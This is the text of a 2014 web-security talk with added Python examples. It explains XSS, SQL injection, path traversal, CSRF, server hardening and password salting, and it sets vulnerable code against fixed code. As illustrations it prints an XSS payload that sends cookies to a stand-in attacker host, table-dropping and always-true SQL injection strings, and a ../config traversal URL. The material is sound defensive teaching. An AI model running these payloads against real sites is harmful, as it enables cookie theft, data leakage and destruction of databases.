Modern Web Security


DESCRIPTION

Basic security concepts for web applications and web sites for today's environment. Server Configuration, Site Configuration, Best Practices, and Passwords.


Bill Condo / @mavrck

Modern Web Security: Attacks & Improvements

4/2/2014 | Dayton Web Developers


Who here is responsible for a website?


Who here has published code updates live in the last month?


Are they secure?


What We’ll Cover

• Common Threats

• Easy Improvements

• Bonus: Passwords


Common Threats

• Cross Site Scripting

• SQL Injection

• Path Disclosure

• Cross Site Request Forgery

• Information Disclosure


• Denial of Service

• Code Execution

• Memory Corruption

• Arbitrary File

• Local File Include

• Remote File Include

• Buffer overflow


Cross-site scripting (XSS)

• In a nutshell: a website that lets attacker-controlled content be sent back, unencoded, in a response to another user's browser, which then treats it as part of the page.

• Typically this is JavaScript placed in a query-string parameter or form field that the site reflects (or stores) and renders without encoding, so it runs with the site's own origin.

• Exposes session cookies and other sensitive data, and lets the attacker act as that user on the site.
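An added example, not part of the slides, in Python: the same greeting rendered by reflecting a constructed payload straight into the HTML and by HTML-encoding it first, plus an attribute-context variant, because the encoding needed depends on where the value lands. html.escape is Python's standard library; the function names, the payload and the demo-only check are constructed for this illustration.

```python
import html

# Constructed attacker input: the kind of thing sent in a query string or form field.
PAYLOAD = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'


def render_vulnerable(name: str) -> str:
    """Reflects the input straight into the HTML body: the browser parses and runs the script."""
    return f"<p>Hello, {name}!</p>"


def render_escaped(name: str) -> str:
    """HTML-encodes the input for an element-body context, so the browser shows it as text."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


def render_attribute(value: str) -> str:
    """Attribute context: the value must be encoded AND the attribute quoted.

    Encoding alone is not enough in an unquoted attribute (value=foo onmouseover=...),
    and quoting alone is not enough because an unencoded " closes the quote.
    """
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def contains_active_script(page: str) -> bool:
    """Demo-only check: does the rendered page still contain a raw <script> tag or a live handler?"""
    lowered = page.lower()
    return "<script" in lowered or ' onmouseover="' in lowered


if __name__ == "__main__":
    for label, page in [("vulnerable", render_vulnerable(PAYLOAD)),
                        ("escaped", render_escaped(PAYLOAD))]:
        print(f"{label}: active script = {contains_active_script(page)}")
        print("   ", page)
    print(render_attribute('" onmouseover="alert(document.cookie)'))
```

Encoding on output is the fix; "sanitizing" on input alone fails because the same string is safe in one context and dangerous in another (a URL, a JavaScript string and an HTML attribute each need their own encoding).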


SQL Injection

• Allowing user input to be inserted directly into database queries, so the input becomes part of the SQL rather than a value. The result is unexpected data, database corruption, and data leakage.

• (original) statement = "SELECT * FROM users WHERE id ='" + id + "';"

• (input) 0'; DROP TABLE users; --

• (final) statement = "SELECT * FROM users WHERE id ='0'; DROP TABLE users; --';"

• The -- comments out the closing quote the code appends. Whether the second statement actually runs depends on the database API allowing stacked queries; an input such as ' OR '1'='1 needs no such support and simply returns every row.
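An added example (mine, not from the slides) in Python with the standard sqlite3 module and a constructed in-memory users table: the concatenated query from the slide beside a parameterized one, and the slide's DROP TABLE payload run through execute(), which refuses stacked statements, and through executescript(), standing in for a database API that does not. The payload in the code balances the trailing quote with SELECT ' instead of commenting it out with --, so the whole string is valid SQL either way; function names are mine.

```python
import sqlite3

# Quote-balanced variant of the slide's payload: the code appends "';", so the final
# statement becomes ... id ='0'; DROP TABLE users; SELECT '';  (three complete statements)
DROP_PAYLOAD = "0'; DROP TABLE users; SELECT '"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table with sample rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("1", "alice", "alice@example.com"),
        ("2", "bob", "bob@example.com"),
        ("3", "carol", "carol@example.com"),
    ])
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """String concatenation, as on the slide: the input becomes part of the SQL grammar."""
    statement = "SELECT * FROM users WHERE id ='" + user_id + "';"
    return conn.execute(statement).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, user_id: str) -> list:
    """Prepared statement: the value travels separately from the SQL and can only ever be a value."""
    return conn.execute("SELECT * FROM users WHERE id = ?", (user_id,)).fetchall()


def table_exists(conn: sqlite3.Connection, name: str = "users") -> bool:
    row = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


def stacked_attack(conn: sqlite3.Connection, payload: str, permissive_api: bool) -> bool:
    """Run the DROP TABLE payload through the vulnerable query; True if the users table survived.

    permissive_api=False uses execute(), which in sqlite3 refuses a second statement.
    permissive_api=True uses executescript() to stand in for an API that runs stacked
    queries (e.g. mysqli::multi_query), which is where the slide's outcome actually happens.
    """
    statement = "SELECT * FROM users WHERE id ='" + payload + "';"
    try:
        if permissive_api:
            conn.executescript(statement)
        else:
            conn.execute(statement)
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        pass  # driver refused the stacked statement; nothing ran (Warning in older Pythons)
    return table_exists(conn)


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, ' OR '1'='1 :", lookup_vulnerable(conn, "' OR '1'='1"))
    print("parameterized, same input:", lookup_parameterized(conn, "' OR '1'='1"))
    print("table survives execute():    ", stacked_attack(conn, DROP_PAYLOAD, permissive_api=False))
    print("table survives executescript:", stacked_attack(make_db(), DROP_PAYLOAD, permissive_api=True))
```

A driver that rejects stacked queries is not a defence: the OR-based input leaks the whole table through a single, perfectly valid statement. Only parameterization (or an ORM built on it) takes the input out of the grammar.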


http://xkcd.com/327/


Path Disclosure

• Letting an attacker learn the filesystem path to the web root, e.g. /home/site.com/public/index.php, typically through an error message or stack trace.

• On its own this is a nugget of knowledge; combined with a file-include or path-traversal bug it tells the attacker exactly where configuration and private files live, and can be the step that leads to full access.

• http://site.com/index.php?page=about

• http://site.com/index.php?page=../config (the page parameter is joined to a path without checking that the result stays inside the web root)
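An added example, not from the slides, in Python: a resolver for the ?page= parameter above that rejects anything resolving outside the web root, next to the stricter allow-list approach. The directory layout is constructed in a temporary directory for the demo (a real config.php outside the webroot, a fake secret inside it); function names and the ".php" suffix convention are assumptions of this illustration.

```python
import os
import tempfile
from typing import Optional


def resolve_page(base_dir: str, page: str) -> Optional[str]:
    """Map ?page=<name> to <base_dir>/<name>.php, refusing anything outside base_dir.

    Returns the real path of the file, or None when the request is rejected.
    """
    if "\0" in page:               # NUL-truncation trick; reject before touching the filesystem
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, page + ".php"))
    # commonpath respects directory boundaries: /var/www-evil is not inside /var/www,
    # and realpath has already collapsed ../ and followed symlinks.
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


ALLOWED_PAGES = frozenset({"about", "contact"})


def resolve_page_allowlist(base_dir: str, page: str) -> Optional[str]:
    """Stricter alternative: only names from a fixed allow-list are ever joined to a path."""
    if page not in ALLOWED_PAGES:
        return None
    return os.path.join(os.path.realpath(base_dir), page + ".php")


def build_demo_tree() -> str:
    """Constructed layout for the demo:
       <root>/public/about.php   legitimate page inside the webroot
       <root>/config.php         secret kept outside the webroot (as the slides recommend)
    Returns the webroot path."""
    root = tempfile.mkdtemp(prefix="webroot-demo-")
    public = os.path.join(root, "public")
    os.mkdir(public)
    with open(os.path.join(public, "about.php"), "w") as fh:
        fh.write("<h1>About</h1>\n")
    with open(os.path.join(root, "config.php"), "w") as fh:
        fh.write("<?php $db_password = 'constructed-demo-secret';\n")
    return public


if __name__ == "__main__":
    public = build_demo_tree()
    for requested in ["about", "../config", "/etc/passwd", "about\0"]:
        print(repr(requested), "->", resolve_page(public, requested))
```

Note that the check is on the resolved path, not on the string: stripping "../" from the input is bypassable (for example "....//"), while comparing real paths is not.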


Cross Site Request Forgery (CSRF)

• Tricks an authenticated user's browser into sending a request that the site carries out with that user's session. The site cannot tell the request was not intended, commonly because a state-changing feature is driven by URL parameters and has no per-request verification (such as a token) beyond the session cookie the browser attaches automatically.

• http://site.com/send-message.php?from=bill&to=brad&message=hi

• Triggered from a page the attacker controls (an image tag or auto-submitting form aimed at the URL above), or by malicious code injected into the site itself via XSS.
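An added example, not from the slides, in Python: a simulated handler for the send-message URL above, shown with a forged GET (what the slide's link does), a forged POST from an attacker's page, and a genuine POST carrying a token bound to the session. The server secret, the session table and the handler are constructed for this illustration; hmac, hashlib and secrets are Python's standard library.

```python
import hashlib
import hmac
import secrets

# Assumptions for the demo: one server-side secret (generated at startup here; in production a
# stored secret kept outside the webroot) and a constructed session table.
SERVER_SECRET = secrets.token_bytes(32)
SESSIONS = {"s3ss10n-bill": "bill"}          # session cookie value -> logged-in user


def make_csrf_token(session_id: str) -> str:
    """Token bound to the session: nonce + HMAC(secret, session_id:nonce). Embed it in each form."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def handle_send_message(method: str, cookies: dict, form: dict):
    """Simulated handler for /send-message. Returns (status, body).

    The session cookie proves which browser this is, not that the user meant to send this
    request: a cross-site page can make the browser send it with the cookie attached.
    """
    session_id = cookies.get("session")
    if session_id not in SESSIONS:
        return 401, "not logged in"
    if method != "POST":
        return 405, "state changes are POST only; a GET from an <img src=...> must not send mail"
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    return 200, f"message from {SESSIONS[session_id]} to {form.get('to')}: {form.get('message')}"


if __name__ == "__main__":
    cookie = {"session": "s3ss10n-bill"}
    forged_get = ("GET", cookie, {"to": "brad", "message": "hi"})    # the slide's URL in an <img>
    forged_post = ("POST", cookie, {"to": "brad", "message": "hi"})  # auto-submitted form on evil site
    token = make_csrf_token("s3ss10n-bill")                          # rendered into the site's own form
    genuine = ("POST", cookie, {"to": "brad", "message": "hi", "csrf_token": token})
    for req in (forged_get, forged_post, genuine):
        print(req[0], handle_send_message(*req))
```

The attacker's page can make the browser send the cookie, but cannot read the site's HTML to learn the token, which is why a token the server can verify distinguishes the genuine form from the forged one. Marking the session cookie SameSite adds a second, browser-enforced layer.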


Information Disclosure

• Releasing sensitive information to an untrusted party. This can be details of the operating environment, customer data, or trade secrets.

• Path that the website runs at, database info, service versions, etc.

• Credit card data, private account info (address, phone), and customer history.

• Business logic, processes, and long-term business plans.


Easy Improvements

• Secure Your Environment

• Secure Your Website

• Establish Audits


Secure Your Environment

• Leave your cheap shared web host (BlueHost, GoDaddy, etc.) and move to a Virtual Private Server (VPS) such as Digital Ocean, Linode, Rackspace, AWS, etc. On shared hosting you inherit every other tenant's security problems.

• Turn off the display of errors and debugging info in production, and send them to log files instead.

• Turn on automatic updates for security patches.

• Turn off broadcasting of service versions and extensions (server headers and banners).

• Turn off modules that aren't required.


Sorry, We’re Not Sharing Security…


Thanks for letting me know…


Secure Your Website

• Validate user input. Always. And encode output for the context it lands in (HTML body, attribute, URL, JavaScript).

• Escape and sanitize anything that goes into a database query. Better yet, use prepared statements (parameterized queries) from an established package.

• Store sensitive data (configuration, credentials, uploads) outside of the webroot with proper permissions.

• HTTPS (TLS) wherever possible, not just on login pages.

• Sandbox user uploads and treat them with suspicion: keep them outside the webroot and never let the server execute them.


Establish Audits

• Black Box: Security/Vulnerability Scanners, Penetration Tests

• White Box: Source Code Analyzers, Code Tests

• Password Testing


More Security Info

• http://www.webappsec.org

• http://www.owasp.org


Stretch. Last-minute bucket. We're in overtime.


Bonus: Password Security

• Terminology

• Landscape/Problems

• Best Practices

• Getting Policy Buy-in


Password Terminology

• Encrypting - The process of encoding messages or information in such a way that only authorized parties can read it*. Encryption uses a key and is reversible: anyone holding the key can recover the original.

• Hashing - Password hashing is a one-way conversion of an input into a fixed-size representative string (illustratively, nothing = 4fhk348fhsk48rfk4d3). There is no key and no way back, so a login is checked by hashing the supplied password and comparing the result.

• Salting - A unique random string, generated per user and stored alongside the hash, that is mixed into the password before hashing. It keeps the hashes different for users who share a password and stops one precomputed table from being reused against every account.

*http://en.wikipedia.org/wiki/Encryption


• Entropy (Strength) - A measure of the uncertainty associated with a random variable; for a password, how many guesses an attacker needs in the worst case (i.e. Password Strength).

• Rainbow Tables - Pre-calculated lookup tables that map the output of a known hash algorithm back to an input, so an unsalted hash is reversed by lookup instead of by guessing.
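An added example, not from the slides, in Python, covering the hashing, salting and rainbow-table terms above: an unsalted fast hash that a precomputed table reverses immediately, beside a per-user salted PBKDF2 hash that it cannot, with verification done in constant time. hashlib, hmac and os are Python's standard library; the iteration count, the storage format and the short list of common passwords are constructed for this demo.

```python
import hashlib
import hmac
import os

# PBKDF2-HMAC-SHA256 work factor: demo value. Raise it until one hash takes ~100 ms on your hardware.
ITERATIONS = 200_000
COMMON = ["password", "123456", "letmein", "qwerty"]   # constructed shortlist for the demo


def unsalted_md5(password: str) -> str:
    """What not to do: fast and unsalted, so identical passwords give identical hashes."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password: str, salt: bytes = None) -> str:
    """Per-user random salt + slow KDF. Stored form: algo$iterations$salt_hex$hash_hex."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_hex, dk_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    except ValueError:          # malformed record: wrong field count, bad hex, bad int
        return False
    return hmac.compare_digest(dk.hex(), dk_hex)


def build_lookup_table(candidates) -> dict:
    """Stand-in for a rainbow table: digest -> password, precomputed once for the unsalted hash."""
    return {unsalted_md5(p): p for p in candidates}


def crack_with_table(table: dict, digest: str):
    """Reverse a digest by lookup; None when the table has no entry for it."""
    return table.get(digest)


if __name__ == "__main__":
    table = build_lookup_table(COMMON)
    print("two users, same password, md5 equal:", unsalted_md5("password") == unsalted_md5("password"))
    print("table reverses md5:", crack_with_table(table, unsalted_md5("password")))
    a, b = hash_password("password"), hash_password("password")
    print("salted hashes differ:", a != b)
    print("table reverses salted hash:", crack_with_table(table, a.split("$")[-1]))
    print("verify right/wrong:", verify_password("password", a), verify_password("Password", a))
```

The salt is not secret; it is stored next to the hash. Its job is to make every hash unique so that a precomputed table, or one cracking run, cannot be amortized across accounts, while the iteration count is what makes each guess expensive.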


http://xkcd.com/936/


Problems


State of Passwords

• Most people reuse passwords between sites

• Most people don't use secure passwords

• Secure, high-entropy passwords are hard to remember without help

• Most people don't use a password manager


Lack of Transparency

• Web apps and sites don't disclose their password policies or how strongly passwords are hashed or encrypted, and there isn't a standards body to police who's following best practices and who's being risky.

• Users often don't find out what data was compromised in an attack, and frequently don't find out about a breach at all until it reaches the news cycle.


Forgotten Trail

• With e-commerce, we often have to create an account, provide payment details, and then may never shop there again. However, the data persists.

• Users typically don’t keep a master list of sites they have an account on, or have purchased from. Each account can act as a nugget of knowledge, slowly building up to enough data for concern.


Best Practices / Worst Practices


Don't help the enemy

• Don't: Policies that enforce things such as "first character must be upper case" and "must end in a special character". They shrink the search space and let a cracker run a mask (one fixed pattern of character classes) instead of a brute-force search.

• Don't: To an extent, disclosing the exact minimum requirements for lower case, upper case, numeric, and special characters; a published policy tells the attacker the shape of every password.


Garbage in, garbage out

• Don't: Have no password policy at all.

• Don't: Allow common passwords like 'password', '123456'.

• Don't: Allow common dictionary words.


Getting Policy Buy-in


#1 Prevent PR Issues


#2 Cost vs Risk

• Doing security correctly up front is cheaper than cleaning up afterwards; the opportunity cost is minimal compared to the reduction in risk. Expected cost = Likelihood × Impact.

• What does it cost to clean up the mess: reset the passwords, scan the servers, added support calls/requests, etc…


#3 Predictability

• Help project/business managers minimize unexpected security response events.

• Know better how your week is going to go.


My Ask of You

• If you found this information useful, I ask two things of you:

• Follow me on Twitter for development tips: @mavrck

• Back the Salt Mines Device Lab fundraiser for $1+: http://igg.me/p/728005

• Also, we’re hiring at LMG. Grab a card if you’re currently not next to your boss (otherwise email bill@lmgresults.com).


Roaring Applause Here. Thanks for your time.
